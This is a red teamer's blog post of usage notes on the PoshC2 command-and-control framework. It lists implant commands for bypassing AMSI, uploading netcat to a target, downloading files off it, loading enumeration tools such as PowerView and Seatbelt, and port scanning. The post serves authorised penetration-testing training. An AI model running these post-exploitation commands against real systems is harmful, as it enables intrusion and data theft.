Yaksas Security

Cyber Security Research

  • Yaksas Security Home
  • Home
  • Yaksas Security Classroom
  • Learn Adversary Emulation
  • Contact Yaksas
PoshC2: A Red Teamer’s Notes

Uday Mittal July 8, 2020 Leave a Comment

PoshC2: A Red Teamer’s Notes

This is an ongoing post containing my notes on PoshC2 usage.

What is PoshC2?

PoshC2 is a command and control software. It is used to carry out post-exploitation tasks such as persistence, privilege escalation, lateral movements etc. during penetration testing and red teaming exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.

All of PoshC2 functionality can be divided into five components:

PoshC2 Server – Serves payloads that can be executed on target machine(s) and send a connection back to PoshC2. The server console also displays the output of command(s) executed on an implant. The server is written in Python.

Implants Receiver – Listens for the incoming implant connections and aggregates them. It is also used to load modules and execute commands on a single, multiple or all implants.

Payloads – Commands, shellcode, executable binaries that when executed on target machine(s) (aka implants) sends back a connection to Implant receiver. Payloads are developed using C#, Python, PowerShell, JavaScript, VBScript and support Windows, Linux (Python) and MacOS (Python).

Implants – Target machine(s) connected to PoshC2.

Modules – Scripts (PowerShell and Python) and executable binaries (C#) that help in conducting various post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dump, port forwarding etc. A comprehensive list of modules is available here.

How to use?

The following video shows how to get PoshC2 up and running quickly. It covers:

  • Installation on Kali Linux 2020.2
  • Configuring PoshC2
  • Running Posh-server and implants receiver
  • Managing implants
  • Modules
  • Loading C# and PowerShell modules on an Implant
  • Running commands on an implant

Read this to learn more about the lab environment used in this video.

Useful Commands (C# Implants)

Selecting Implant(s)

  • To select a single implant, enter the ImplantID
  • To select multiple implants, enter a comma separated list of ImplantIDs
  • To select all implants, enter ALL

Quick Reference List of Commands

Issue the following command when connected to an implant(s)

help

Bypass AMSI

bypass-amsi

Upload files

upload-file <source file path> <destination file path>
Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe

Download files

download-file <file path>
Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'

This will save a copy of the target file in the PoshC2 project directory.

List Modules

To list implant specific modules, select an implant and issue the following command:

  
listmodules 

To list all modules, issue the following command at implant selection prompt:

 
listmodules 

Load a C# Module

 loadmodule <module name>
Example: loadmodule SharpView.exe 

Load a PowerShell Module

 pslo <module name> 
Example: pslo powerview.ps1 

You can also use loadmoduleforce to load modules.

Execute a PowerShell Command

 sharpps <command> 
Example: sharpps Get-ChildItem -Force -Recurse 

Convert Username and Password to a PSCredentials object

sharpps [string]$userName = 'IND\user.ind02'
sharpps [string]$userPassword = 'Sup3rStr0ngP@ssw0rd'
sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)

After executing above commands, $credObject can be passed as a value to -Credential parameter in PowerShell commands which accept this parameter.

Enumerate an Implant

ls-recurse <directory path>
Example:  ls-recurse C:\Users
get-userinfo
get-computerinfo
loadmodule Seatbelt.exe
seatbelt all
sharpup

Port Scan

portscan <IP> <port> <delay-in-seconds> <max thread>
Example: portscan "192.168.3.8" "1-1000" 1 100

 

 

Related Posts

  • The Three Command and Control TiersThe Three Command and Control Tiers
  • Book Review: Practical Social EngineeringBook Review: Practical Social Engineering
mm
Uday Mittal

Uday Mittal is a cybersecurity professional with rich working experience working with various industries including telecom, publishing, consulting and finance. He holds internationally recognized certifications such as CRTP, OSCE, OSCP, CISSP, CISA, CISM, CRISC among others. He speaks on cybersecurity awareness, offensive security research etc. and has authored various articles on topics related to cyber security and software development for a leading magazine on open source software.

Filed Under: CnC Tagged With: command and control, poshc2, post-exploitation, red team

Optin Form

Search

Follow us on Twitter

My Tweets

Categories

Tags

(ISC)2 Active directory adsecurity adsi adsisearcher adversary emulation Android attack active directory awareness blue whale challenge Certification CISSP Cloud security command and control crte crtp cyber-warfare Cyber Security cybersecurity Cybersecurity books Cybersecurity Cannon domain enumeration ethical hacking forest enumeration hacker Information Security ISACA Kali Linux Mass Surveillance Narendra Modi offensive security Online Safety opsec Password Penetration Testing pentest poshc2 powersploit Powerview privacy red team red teaming Risk Management Social Engineering user enumeration

Top Posts

  • Mr. Robot: Fsociety deploys ransomware
    Mr. Robot: Fsociety deploys ransomware
  • 7 Ways to Cover Your Device's Camera
    7 Ways to Cover Your Device's Camera
  • DCPP: Everything You Need to Know
    DCPP: Everything You Need to Know
  • Active Directory User Enumeration using PowerView
    Active Directory User Enumeration using PowerView
  • SPN Scanning using ADSI (Part 3)
    SPN Scanning using ADSI (Part 3)
  • Book Review: Penetration Testing Azure for Ethical Hackers
    Book Review: Penetration Testing Azure for Ethical Hackers

© Copyright 2020 ElliteDevs · All Rights Reserved · Powered by WordPress